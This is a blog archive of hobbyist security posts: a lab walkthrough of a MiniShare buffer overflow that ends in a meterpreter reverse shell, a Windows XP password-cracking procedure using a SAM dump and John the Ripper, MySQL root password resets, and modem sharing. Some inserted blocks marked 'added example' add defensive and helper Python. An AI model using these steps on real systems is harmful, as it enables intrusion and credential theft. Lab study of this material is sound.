Archive for the ‘hack_docs’ Category

Lesson 0ne: Stack Based Buffer Overflow [minisploit.py]

#=========================================================#
I thought it was a good idea to start learning about exploit development, and my first stop was this wonderful blog by lupin (thanks a LOT lupin).
To all the beginners like myself, I would advise you to look at the tutorials; they are excellent.
So after going through the basics tutorial I thought, why not write the exploit from scratch again, make it take options from the command line, use meterpreter as the payload, and host it somewhere for future reference?
what is it:
++++++++
This is a simple stack based buffer overflow exploit. I wrote it using the guides from lupin’s blog, as said earlier.
It exploits a vulnerability in the Windows application MiniShare 1.4.1, an older version of the MiniShare application.
Requirements:

+++++++++++++
1. To test this script you will need a Windows XP SP2 machine (can be a virtual machine)
2. The XP machine should be running MiniShare 1.4.1, available here
3. An attack machine (should have Python and Metasploit installed); BackTrack should do
how to:
++++++
[1] First get the script from here
[2] The payload I used here is meterpreter/reverse_tcp, so we need to start a listener on our attacking machine to take care of this
how:
+++++
[a] run msfconsole from your terminal or from the msf installation directory

root@chim3ra:~# cd /pentest/exploits/framework3
root@chim3ra:/pentest/exploits/framework3# ./msfconsole

o                       8         o   o
8                       8             8
ooYoYo. .oPYo.  o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8  o8P
8' 8  8 8oooo8   8  .oooo8 Yb..   8    8 8 8    8  8   8
8  8  8 8.       8  8    8   'Yb. 8    8 8 8    8  8   8
8  8  8 `Yooo'   8  `YooP8 `YooP' 8YooP' 8 `YooP'  8   8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

=[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 696 exploits - 358 auxiliary - 52 post
+ -- --=[ 224 payloads - 27 encoders - 8 nops
=[ svn r12936 updated 11 days ago (2011.06.13)


Warning: This copy of the Metasploit Framework was last updated 11 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://www.metasploit.com/redmine/projects/framework/wiki/Updating
msf >

[b] Then we use multi/handler to listen on our attacking machine, set the payload to meterpreter and lhost to our attacking IP.


msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(handler) >

[c]And finally we exploit


msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.56.1:4444
[*] Starting the payload handler...

[2] Now make sure that MiniShare is running on your XP box; if not, just double click on the shortcut on your desktop and drag a folder or file inside.
Running the script:

++++++++++++++
[2] You may run the script with no options or with the -h (help) option to get the usage


root@chim3ra:~/exploit_home# ./minisploit.py
you need at least one arguments

###################################################################
#============+++++++++ minisploit.py ver0.1++++++++==============#
#----------------by ch!m3ra: http://www.chimera40.wordpress.com------------------#
#=============++++++++++++++++++++++++++++++++++++++==============#
###################################################################

Usage:./minisploit.py <options>
./minisploit.py -t <host> -p <port>
-t          The remote host to exploit
-p          The remote port (Default is 80)
-h          Simply print this help menu and exit for
Example:./minisploit.py -h 192.168.56.101 -p 80
(this will exploit minishare server at 192.168.56.101 )
or ./minisploit.py -h for help
please make sure you start multi handler(meterpreter)

[3] Then run it giving -t <host> (target option), where <host> is your XP machine’s IP
[4] NB: You may give the -p <port> (port option) or leave it at the default 80, which is where MiniShare runs by default.
[d] Everything is set, let’s launch our exploit

root@chim3ra:~/exploit_home# ./minisploit.py -t 192.168.56.101 -p 80

###################################################################
#============++++++ minisploit.py ver 0.1 ++++++++++==============#
#--------by ch!m3ra: http://www.chimera40.wordpress.com-----------#
#=============++++++++++++++++++++++++++++++++++++++==============#
###################################################################

[+]Trying your payload on 192.168.56.101  Port 80 Please Wait......
[+]Connecting to  192.168.56.101 ........
[+]Connection successful!
[+]Delivering your payload be patient......
[+]Done!
[+]Your exploit data has been send to 192.168.56.101 Check you handler happy? :)
root@chim3ra:~/exploit_home#

[e]Done and when we check our handler
boooom!

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.56.1:4444
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1035) at Fri Jun 24 11:57:11 +0300 2011

meterpreter >
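Seen from the defender's side, the exploit above reaches MiniShare as one oversized HTTP request to port 80. The Python below is an added example, not part of the original post or of minisploit.py: it runs a plain request-line check over constructed sample requests and flags a request target that is implausibly long or contains non-printable bytes. It assumes the overflow is carried in an over-long request target (the usual shape of this class of small-web-server bug on the wire); MAX_TARGET_LEN is an assumed threshold and the sample traffic is made up, not captured.

```python
from dataclasses import dataclass
from typing import List, Optional

# Assumed threshold: longer than any path a small file-sharing server
# would legitimately be asked for. Tune it to the application.
MAX_TARGET_LEN = 512
PRINTABLE = set(range(0x20, 0x7F))


@dataclass
class Finding:
    index: int          # position of the request in the input list
    reason: str
    target_len: int


def request_line(raw: bytes) -> bytes:
    """First line of an HTTP request, without the CRLF."""
    return raw.split(b"\r\n", 1)[0]


def inspect_request(index: int, raw: bytes) -> Optional[Finding]:
    """Return a Finding for a suspicious request, None for a normal one."""
    line = request_line(raw)
    parts = line.split(b" ")
    if len(parts) != 3:
        return Finding(index, "malformed request line", len(line))
    _method, target, _version = parts
    if len(target) > MAX_TARGET_LEN:
        return Finding(index, "oversized request target", len(target))
    if any(b not in PRINTABLE for b in target):
        return Finding(index, "non-printable bytes in target", len(target))
    return None


def scan(requests: List[bytes]) -> List[Finding]:
    """Inspect every request and collect the suspicious ones."""
    findings = []
    for i, raw in enumerate(requests):
        f = inspect_request(i, raw)
        if f:
            findings.append(f)
    return findings


# Constructed sample traffic (not a real capture): three ordinary requests,
# one with an over-long target and one with raw bytes where a path belongs.
SAMPLE_REQUESTS = [
    b"GET / HTTP/1.1\r\nHost: 192.168.56.101\r\n\r\n",
    b"GET /index.html HTTP/1.1\r\nHost: 192.168.56.101\r\n\r\n",
    b"GET /files/report.pdf HTTP/1.1\r\nHost: 192.168.56.101\r\n\r\n",
    b"GET /" + b"A" * 2000 + b"\x90\x90\xcc\xcc HTTP/1.1\r\n\r\n",
    b"GET /\x90\x90\xcc HTTP/1.1\r\nHost: 192.168.56.101\r\n\r\n",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_REQUESTS):
        print(f"request {f.index}: {f.reason} (target length {f.target_len})")
```

The same check works on a web server's access log or on request lines pulled from a packet capture; the point is that a stack overflow in a request parser has to arrive as a request the parser was never meant to see, so a size and character-class rule on the request line is a cheap first detection.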

That’s all there is to the post. I know it’s a long post for no good reason, but it’s a post anyway 😉
If you have read all through, then here are some goodies and some fun here.

This links collection I stumbled over on the net; you must like it.
Thanks to Myne-us for the links and lupin for teaching me; you guys rock 🙂

[how to set up your phone as a modem in Linux]

################################################################  ######==================———————=====================#######

Howdy all!

In this blog post I will summarise what I presented at our JLUG meeting (how to get a reliable internet connection in your room using a mobile phone as a modem in BackTrack Linux).

Requirements:

~~~~~~~~~~~

[1] A YU line (you may use others but be ready to pay)

[2] A mobile phone (with cable) or any 3G modem, e.g. Huawei or any other

[3] A Linux machine (either installed or a live CD)

Steps:

   

~~~~~~~

[1] Setup:
To set up your modem (phone), plug it in and open a Linux terminal. From the Linux terminal type:

code:

root@bt:~# wvdialconf

why? wvdialconf is part of the wvdial scripts that will help you set up your modem. It will
(a) Detect your modem (first it searches the serial ports for available modems)

(b) After detection, create a configuration file for you at /etc/wvdial.conf. NB: after the command has terminated you should see a message at the end that the configuration file has been created.

[2] Edit conf file:
To edit the configuration file, fire up your favorite text editor (mine is nano) and load the configuration file (/etc/wvdial.conf)

code:

root@bt:~#nano /etc/wvdial.conf

You should see some of these details (your modem type, port, baud rate etc.). Uncomment the commented entries, in this case Password, Username and Phone, and make sure they have these values

Phone=*99#

Password=yu

Username=yu

When you are done just press Ctrl+X (and answer Y when asked to save). why? this will save your changes and exit from the nano text editor.

[3] Connecting:
Now to the juicy part. To connect just type:

code:

root@bt:~#wvdial

why? wvdial is simply the dialer script that will dial your carrier (ISP), in this case YU, so that you can be assigned an IP. After this command you should get an IP (your IP, gateway and a DNS server or two should be displayed) and a new interface (usually ppp0) will be created for you.

NB: don’t close this terminal until you are done with the connection!!!

[4]Test the connection:
To test the connection simply ping whatever you want to:

code:

root@chimera:~# ping google.com
PING google.com (72.14.234.104) 56(84) bytes of data.
64 bytes from mil01s07-in-f104.1e100.net (72.14.234.104): icmp_seq=1 ttl=52 time=496 ms
64 bytes from mil01s07-in-f104.1e100.net (72.14.234.104): icmp_seq=2 ttl=52 time=1016 ms
64 bytes from mil01s07-in-f104.1e100.net (72.14.234.104): icmp_seq=3 ttl=52 time=416 ms
^C
--- google.com ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2716ms
rtt min/avg/max/mdev = 416.679/643.066/1016.346/265.937 ms, pipe 2
root@chimera:~#

Success!!!

If you are alone, that’s all. And for our Ubuntu brothers? No need to do all this! Just plug and play stuff: next, next, OK.

Sharing the connection

~~~~~~~~~~~~~~~~~~~~~~~

At times you may want to share this connection with your roommate or anybody in the LAN, but how?

Concept:

~~~~~~~~

The trick here is simply to tell your friend to use your IP as his/her gateway, then you set up your Linux machine as a gateway and forward all the traffic.

NB: your friend’s OS does not matter and the connection speed will not be affected much.

[Step I] First let’s clear the iptables rules (not a must)

code:

root@chimera:~# iptables --flush
root@chimera:~# iptables --table nat --flush
root@chimera:~# iptables --delete-chain
root@chimera:~# iptables --table nat --delete-chain
root@chimera:~#

[Step II]

Set iptables to forward traffic through our new interface(ppp0)

code:

root@chimera:~# iptables --table nat --append POSTROUTING --out-interface ppp0 -j MASQUERADE
root@chimera:~# iptables --append FORWARD --in-interface eth0 -j ACCEPT
root@chimera:~#

(where eth0 is our Ethernet interface, which should be in the LAN)

NB: where the --table option is not specified we refer to the default table (filter); check the man pages (man iptables) for more info. So far our machine is connected to the internet and fully configured as a gateway to the Internet for other machines in the LAN, but we have not enabled IP forwarding in the kernel.

[Step III]

Enabling IP forwarding on our machine. We need to edit the file /proc/sys/net/ipv4/ip_forward and change the value from 0 to 1; one can choose to use an editor or simply redirect 1 to that file. how?

code:

root@chimera:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@chimera:~#

this will change the value from 0 to 1

[step IV]

All done; we tell our friend to set his/her gateway to our IP address.

NB: to get our IP address simply type ifconfig; the IP set for our eth0 should be our friend’s gateway IP. NOTE: We can make sure we are on the same network as our friend by typing:

code:
root@bt:~# ifconfig eth0 <our_IP> netmask <netmask> broadcast <broadcast>   e.g.

root@bt:~# ifconfig eth0 192.168.20.20 netmask 255.255.255.0 broadcast 192.168.20.255

And our friend has an Internet connection as well!!!!!!
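The set-up steps above (patching /etc/wvdial.conf, enabling IP forwarding, and the NAT rules of Steps I to III) fit in one script. The Python below is an added example and not the automation script the post promises; it assumes wvdialconf has already written /etc/wvdial.conf, that the dial-up interface is ppp0 and the LAN side is eth0, and it uses the YU values from the post. It does not start wvdial itself, which still goes in its own terminal as described. Its FORWARD rules are tighter than the post's single ACCEPT rule: only LAN-to-ppp0 traffic is forwarded, only replies come back, and the chain's policy is set to DROP, so a host on the LAN cannot use the gateway to reach anything but the dial-up link. Without --apply it only prints what it would do.

```python
#!/usr/bin/env python3
"""Gateway set-up helper (added example, not the post author's script)."""
import re
import subprocess
import sys

WVDIAL_CONF = "/etc/wvdial.conf"
IP_FORWARD = "/proc/sys/net/ipv4/ip_forward"
# The values the post uses for a YU line; other carriers need their own.
CARRIER = {"Phone": "*99#", "Username": "yu", "Password": "yu"}


def patch_wvdial_conf(text: str, settings: dict) -> str:
    """Rewrite (and uncomment) the 'Key = value' lines that wvdialconf left
    commented out, e.g. '; Phone = <Target Phone Number>'. Keys missing
    altogether are appended so the dialer still gets them."""
    seen = set()
    out = []
    for line in text.splitlines():
        m = re.match(r"^\s*;?\s*(\w+)\s*=", line)
        if m and m.group(1) in settings:
            out.append(f"{m.group(1)} = {settings[m.group(1)]}")
            seen.add(m.group(1))
        else:
            out.append(line)
    for key, value in settings.items():
        if key not in seen:
            out.append(f"{key} = {value}")
    return "\n".join(out) + "\n"


def enable_ip_forward(path: str = IP_FORWARD) -> bool:
    """Set the kernel forwarding switch and read it back. The /proc write
    does not survive a reboot; net.ipv4.ip_forward=1 in /etc/sysctl.conf does."""
    with open(path, "w") as fh:
        fh.write("1\n")
    with open(path) as fh:
        return fh.read().strip() == "1"


def gateway_commands(wan: str = "ppp0", lan: str = "eth0") -> list:
    """iptables commands to NAT the LAN out through the dial-up interface.
    Only the nat table and the FORWARD chain are flushed, so the host's own
    INPUT rules are left alone."""
    return [
        ["iptables", "--table", "nat", "--flush"],
        ["iptables", "--flush", "FORWARD"],
        ["iptables", "--table", "nat", "--append", "POSTROUTING",
         "--out-interface", wan, "-j", "MASQUERADE"],
        ["iptables", "--append", "FORWARD", "--in-interface", lan,
         "--out-interface", wan, "-j", "ACCEPT"],
        ["iptables", "--append", "FORWARD", "--in-interface", wan,
         "--out-interface", lan, "-m", "state",
         "--state", "RELATED,ESTABLISHED", "-j", "ACCEPT"],
        ["iptables", "--policy", "FORWARD", "DROP"],
    ]


def run(commands: list, dry_run: bool = True) -> None:
    """Print each command; execute it (needs root) only when dry_run is False."""
    for argv in commands:
        print(" ".join(argv))
        if not dry_run:
            subprocess.run(argv, check=True)


if __name__ == "__main__":
    apply_changes = "--apply" in sys.argv
    if apply_changes:
        with open(WVDIAL_CONF) as fh:
            conf = fh.read()
        with open(WVDIAL_CONF, "w") as fh:
            fh.write(patch_wvdial_conf(conf, CARRIER))
        print("ip_forward enabled:", enable_ip_forward())
    run(gateway_commands(), dry_run=not apply_changes)
```

Run it once without arguments to review the rule set, then as root with --apply after wvdial has brought ppp0 up.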

IMPORTANT

===========

This is not entirely free as you may think, but it’s “free” in that the cost is fair for such connection speeds. To pick a tariff dial *154# from your YU line and choose a package that fits your pocket or needs (option number 4 for individuals and number 3 for two or more people should be OK).

An automation shell script (to automatically do everything for you) will be available for download soon; keep watch :)

#######################################END######################################### ================Brought to you courtesy of ch!m3ra and JLUG======================== ###################################################################################

 
 
 
 
 
 

 

Recover mySQL root password

#########———————————————————-#############
———————+++++++++++++++++++++++++————————-
=================================================

[1] At times we may not have the MySQL default root password, especially when we are running a live system (Linux live CD) and in some “other” situations.
This should not stop us in our tracks.
To get around this I came up with a small tutorial on how to reset the root user password in a few steps.
NB: tested on MySQL ver. 5.0.67
[2] To start with, check whether the MySQL service is running.

code:

#service mysql status <ENTER>

if mysql is running then do this to stop it

code:

#service mysql stop <ENTER>

you should get a message that the mysql service has been stopped

[3] Now that we have stopped the service, we will start it once more, but this time in safe mode, skipping the grant tables, which MySQL uses to check passwords (Google this).

code:

 # mysqld_safe --skip-grant-tables <ENTER>


NB: The service is started but does not immediately go to the background, so leave it running and open a different terminal in another tab or window.
[4] In the new terminal, log in to the MySQL database without a password by typing mysql.
code:

# mysql <ENTER>

This should log you in automatically, i.e. you should see this kind of prompt: mysql>, some instructions and probably the MySQL version, in my case (5.0.67)

[5] Now that we are logged in to our database, to change the root password we have to use one of the default databases; to list them,

code:

# show databases ; <ENTER>

You should see a database named mysql to use it

code:

# use mysql ; <ENTER>

See, everything is OK, or so it seems

[6] Finally it’s time to change the password; simply do this

code:

 # update user set Password=PASSWORD('your_new_password_here') WHERE user='root';

to flush the privileges

code:

 # flush privileges ;

finally exit

code:

 # exit ;

[7] Now kill whatever is related to what we have been talking about, i.e. (ps -e | grep mysql),
e.g. mysqld_safe and/or mysql if not already dead, i.e. (kill -9 <PID>)

YOU ARE NOW FREE TO LOG IN TO YOUR DATABASE AS root THE ORDINARY WAY

code:

 # mysql -u root -p <ENTER>

password: ************* <ENTER>

and you are done

NB: I have not tried this on a Windows installation of MySQL; try it, I think it should work, just make sure that mysqld.exe and mysql.exe are in your path! You can also start mysqld with a text file having the following code.

code:

update mysql.user set Password=PASSWORD('your_new_password_here') WHERE user='root';
flush privileges;

(these two should be on separate lines; the table is qualified as mysql.user because, unlike in the interactive session above, no database has been selected when the file runs)
you are done and don’t “forget” your password again!?
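The text-file route described just above is the server's --init-file option: the statements run at start-up and the server never has to sit with the grant tables disabled, which is a state in which anyone who can reach it logs in as any user with no password (if you do use --skip-grant-tables, add --skip-networking so only local clients can connect). The Python below is an added example, not the post's code: it writes such a file with a freshly generated password and owner-only permissions, and refuses to overwrite an existing file. The output path and the password length are assumptions; the statements are the post's MySQL 5.0-era ones (newer MySQL releases drop the Password column and PASSWORD() function in favour of ALTER USER).

```python
import os
import secrets
import string

# Alphanumeric only, so the password can be embedded in the SQL statement
# without any quoting or escaping concerns.
ALPHABET = string.ascii_letters + string.digits


def new_password(length: int = 20) -> str:
    """A random password from the OS CSPRNG (secrets, not random)."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def reset_sql(password: str) -> str:
    """The two statements from the post, for the MySQL 5.0 servers it was
    tested on, with the table qualified as mysql.user because an init file
    runs with no default database selected."""
    if not password or any(c not in ALPHABET for c in password):
        raise ValueError("password must be non-empty and alphanumeric")
    return (
        f"UPDATE mysql.user SET Password=PASSWORD('{password}') WHERE User='root';\n"
        "FLUSH PRIVILEGES;\n"
    )


def write_init_file(path: str, password: str = None) -> str:
    """Create the init file with mode 0600, refusing to overwrite an existing
    file, and return the password it contains. Delete the file once the
    server has consumed it: it holds the new root password in clear text."""
    password = password or new_password()
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "w") as fh:
        fh.write(reset_sql(password))
    return password


def remove_init_file(path: str) -> None:
    """Clean-up step for after the server has started with the file."""
    os.remove(path)


if __name__ == "__main__":
    import sys
    # Assumed default location; pass another path as the first argument.
    target = sys.argv[1] if len(sys.argv) > 1 else "/root/mysql-reset.sql"
    print("new root password:", write_init_file(target))
    print("start the server with --init-file", target, "then delete the file")
```

Start the server with the generated file as its --init-file, log in with the printed password, and remove the file; restart the server normally afterwards so it no longer references it.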

brought to you  courtesy of ch1m3ra & JLUG
+++++++++++++++++++++++++++=====END====+++++++++++++++++++++++++++++++++
========================================================================

“Recover win XP password”

Imagine you forgot your Win XP admin password and you have been completely locked out of your own machine.
Worse, your friend lost (forgot) his, and you get into his room when he is just a few seconds from reinstalling the system afresh; how would you help him?
Well, there are so many ways to recover the password, but in this post I will share what I demonstrated at our JLUG meeting.

It’s an old trick but it worked fine.

step[1]
——-
Boot the system with a Linux live CD or flash drive (USB); in my case I used BT3 Final. Log in, open a terminal and you are ready to go.

step[2]
——-
Locate the partition where Win XP has been installed, most probably /mnt/hda1 for an IDE hdd and /mnt/sda1 for a SCSI hdd; they will have been automatically mounted. If not, don’t worry, do this:
check what you have in /dev, locate hdaX where X is 1,2,3…n, then find whichever hosts the Windows installation, i.e. you can mount each of them and find out what it has (the correct one should have Windows system folders like %SYSTEMROOT%, usually c:\Windows\system32):
>ls /dev/ | grep hda  #this command looks for hda partitions available
>mkdir /mnt/windows && mount /dev/hdaX /mnt/windows #this creates a dir “windows” in /mnt and mounts your partition on it; replace X accordingly. From now henceforth our partition is mounted in /mnt/windows/


step[3]
——-
>cd /mnt/windows #move to our directory (not necessary)
>ls #this displays what is there
Win XP stores password information in the two files ‘sam’ and ‘system’; you will find them in /WINDOWS/system32/config
so we create our temp directory at home and a copy of the two files
>mkdir ~/tmp  #create a tmp dir at home
>cp /mnt/windows/WINDOWS/system32/config/sam  ~/tmp/ #copy sam to ~/tmp
>cp /mnt/windows/WINDOWS/system32/config/system ~/tmp/ #copy system to ~/tmp
>cd ~/tmp ; pwd ; ls #go to our new dir, confirm that we are really there and display what we have there (sam & system)


step[4]
——-
Now we use a tool called bkhive on the system hive to extract the boot key into a file, let’s call it key; another one called samdump2 to dump the hashes from the SAM using that key and put them into a single file, let’s call it pass; and finally John the Ripper to crack the password and we are done! [that’s how I understood it]
now from ~/tmp:
>bkhive system > key #you might not see confirmation info
>samdump2 sam key > pass


step[5]
Now let’s launch JtR, or john if you like, pass it our password file and see it in action; it can detect many algorithms, NTLM, MD5, name them (Google):
>john --incremental ~/tmp/pass #most likely you will have to launch john from where it is, but type john and you get some info on what to do; as for me I had to use:
>./john --incremental ~/tmp/pass #I was in john’s installation directory
If you are lucky enough you should have your cracked passwords in seconds, depending on how powerful this machine is, how strong the password is, etc.

My machine is dearly slow; by the twenty-third second it had not cracked the simple password. Look into john for faster means; there is a lot of stuff: use a word list, cracking modes, loading only important passwords etc. Hope your mind is open; dig more, there is a lot.
IMPORTANT: there are better ways to get admin privileges on an XP machine than this using the same BackTrack. This is only made to add to your knowledge.

for more on each of the above commands make good use of the man pages and Google. bye bye

brought to you courtesy of ch!m3ra and JLUG

=====================http://www.chimera40.wordpress.com====================
enjoy responsibly

mysql r00t password reset

==================================================================================================================

Here is a quick and clean one on a Debian installation, MySQL version 5.0 server. I did this successfully without necessarily having to soil my hands

sorry no screen shots 😦

[step1]

from the prompt enter:

root@chimera:~# dpkg-reconfigure mysql-server-5.0

If all goes well you should be prompted to give the new root password

[step2]

re-enter the root password and accept (usually by simply pressing <Enter>)

the mysqld daemon will be stopped and restarted once more and that’s all there is 🙂

you should see something like this

root@chimera:~# dpkg-reconfigure mysql-server-5.0
Stopping MySQL database server: mysqld.
Stopping MySQL database server: mysqld.
Starting MySQL database server: mysqld.
Checking for corrupt, not cleanly closed and upgrade needing tables..
root@chimera:~#

finally log in to the database and have a nice time:

root@chimera:~# mysql -u root -p
Enter password:*******************

(your password will not be displayed as you type)

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 36
Server version: 5.0.67-0ubuntu6 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases ;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
|                    |
+--------------------+
6 rows in set (0.00 sec)

mysql> \q

Bye

root@chimera:~#

NB: As you can see, “your” tables will not be changed at all

by the way, if you are bored of this local stuff you may have a look at this

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

brought to you courtesy of ch!m3ra and JLUG

===================================================================================================================